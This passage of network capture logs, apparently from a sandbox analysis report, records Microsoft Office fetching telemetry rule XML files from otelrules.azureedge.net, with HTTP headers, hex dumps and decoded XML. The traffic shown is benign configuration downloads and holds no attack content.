                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC1374INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 61 6e 61 67 65 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 61 6e 61 67 65 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Manageability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenManageability" S="Medium" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            49192.168.2.44980613.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:31 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                            x-ms-request-id: 75018b07-801e-00a0-22a6-342196000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120231Z-1749fc9bdbds4vwlhC1DFWz44000000002ag00000000anex
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC192OUTGET /rules/rule703851v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1442
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDF82CC90"
                                                                                                                                                                                                                                            x-ms-request-id: f526ff4a-001e-002b-6112-3699f2000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120255Z-16547b76f7f76p6chC1DFWctqw0000000kpg000000009fhq
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC1442INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 38 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4c 69 76 65 50 65 72 73 6f 6e 61 50 69 63 6b 65 72 2e 55 73 65 72 41 63 74 69 6f 6e 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703851" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaPicker.UserActions.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            50192.168.2.44980713.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:31 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 428
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                            x-ms-request-id: 53e8259c-c01e-0046-51a0-342db9000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120231Z-1749fc9bdbdgs9sshC1DFWt6ws00000002f000000000g4c2
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:31 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"
                                                                                                                                                                                                                                            2024-11-14 12:02:55 UTC192OUTGET /rules/rule703850v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE14374CD"
                                                                                                                                                                                                                                            x-ms-request-id: e17c4971-e01e-0052-3bd2-2cd9df000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120255Z-16547b76f7f7rtshhC1DFWrtqn0000000kkg00000000auw7
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 38 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4c 69 76 65 50 65 72 73 6f 6e 61 50 69 63 6b 65 72 2e 55 73 65 72 41 63 74 69 6f 6e 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4c 69 76 65 50 65 72 73 6f 6e 61 50 69 63 6b 65 72
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703850" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaPicker.UserActions" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenLivePersonaPicker


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            51192.168.2.44980913.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:32 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                            x-ms-request-id: d97b6048-401e-000a-3ba6-344a7b000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120232Z-r178fb8d765kzgrxhC1DFWrsuc00000002d0000000004512
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC192OUTGET /rules/rule703800v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1382
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDBEB382A"
                                                                                                                                                                                                                                            x-ms-request-id: 30dac866-a01e-0084-60a6-349ccd000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120256Z-r178fb8d765dbpv9hC1DFWma7000000000qg00000000czek
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC1382INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 38 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4c 69 76 65 50 65 72 73 6f 6e 61 50 69 63 6b 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4c 69 76 65 50 65 72 73 6f 6e 61 50 69 63 6b 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703800" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaPicker" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenLivePersonaPicker" S="Medium"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            52192.168.2.44981013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:32 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                            x-ms-request-id: 47d81796-701e-0021-2403-2d3d45000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120232Z-16547b76f7fp6mhthC1DFWrggn0000000kmg00000000dz1x
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC192OUTGET /rules/rule703701v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:56 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1415
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE88499BE"
                                                                                                                                                                                                                                            x-ms-request-id: 8c65ad06-001e-0066-1093-35561e000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120256Z-r178fb8d765n474shC1DFWge7g00000002h00000000054yt
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:56 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 37 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4c 69 76 65 50 65 72 73 6f 6e 61 43 61 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703701" V="0" DC="SM" EN="Office.Telemetry.Event.Office.LivePersonaCard.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            53192.168.2.44981213.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:32 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                            x-ms-request-id: 2361c5fe-901e-0064-45f6-2ce8a6000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120232Z-16547b76f7fx6rhxhC1DFW76kg0000000kn0000000005a9u
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:32 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
